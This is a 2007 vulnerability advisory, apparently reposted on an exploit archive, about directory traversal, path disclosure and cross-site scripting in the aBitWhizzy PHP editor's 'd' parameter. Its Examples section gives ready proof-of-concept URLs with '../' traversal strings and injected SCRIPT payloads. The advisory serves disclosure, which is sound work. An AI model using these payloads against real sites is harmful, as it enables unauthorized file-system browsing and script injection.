Home / os / solaris

abitwhizzy-traverse.txt

Posted on 29 March 2007

################################################ aBitWhizzy traversal folder enumeration and XSS vendor url: http://www.unverse.net/abitwhizzy/ Advisore:http://lostmon.blogspot.com/2007/03/ abitwhizzy-traversal-folder-enumeration.html vendor notify:YES exploit include:YES ################################################ aBitWhizzy is a php script that uses whizzywig.js to create and edit web pages through a WYSIWYG interface, right through your browser. Now your site can be updated by people with no knowledge of HTML, FTP or AIG (Abbreviations In General). aBitWhizzy contains a flaw that allows a remote traversal arbitrary folder enumeration.This flaw exists because the application does not validate 'd' variable upon submission to 'whizzylink.php','whizzypic.php','whizzery/whizzypic.php' and 'whizzery/whizzylink.php' scripts.This could allow a remote users to create a specially crafted URL that would execute '../' directory traversal characters to view folder structure on the target system with the privileges of the target web service. This input validation error permits too Cross-site scripting Style attacks and full path disclosure. ################### VERSIONS ################### Unknow version of aBitWhizzy ################## SOLUTION ################## No solutions was available at this time !! ###################### TIMELINE ###################### discovered:25-03-2007 vendor notify:25-03-2007 vendor response:--------- Private Disclosure:25-03-2007 public disclosure:27-03-2007 ####################### Examples ####################### Path disclosure: http://localhost/abitwhizzy/whizzylink.php?d=' http://localhost/abitwhizzy/whizzypic.php?d=' http://localhost/abitwhizzy/whizzery/whizzypic.php?d=' http://localhost/abitwhizzy/whizzery/whizzylink.php?d=' Folder enumeration: http://localhost/abitwhizzy/whizzylink.php?d= ../../../../../../../Documents%20and%20Settings http://localhost/abitwhizzy/whizzypic.php?d= ../../../../../../../Documents%20and%20Settings http://localhost/abitwhizzy/whizzery/whizzypic.php?d= /../../../../../../../Documents%20and%20Settings http://localhost/abitwhizzy/whizzery/whizzylink.php?d= /../../../../../../../Documents%20and%20Settings Cross Site Scripting: http://localhost/abitwhizzy/whizzery/whizzypic.php?d= /../../../../../../../Documents%20and%20Settings "><SCRIPT>alert(&apos;XSS&apos;)</SCRIPT> http://localhost/abitwhizzy/whizzery/whizzylink.php?d= /../../../../../../../Documents%20and%20Settings "><SCRIPT>alert(&apos;XSS&apos;)</SCRIPT> http://localhost/abitwhizzy/whizzypic.php?d= ../../../../../../../Documents%20and%20Settings "><SCRIPT>alert(&apos;XSS&apos;)</SCRIPT> http://localhost/abitwhizzy/whizzylink.php?d= ../../../../../../../Documents%20and%20Settings "><SCRIPT>alert(&apos;XSS&apos;)</SCRIPT> ###########################

 

TOP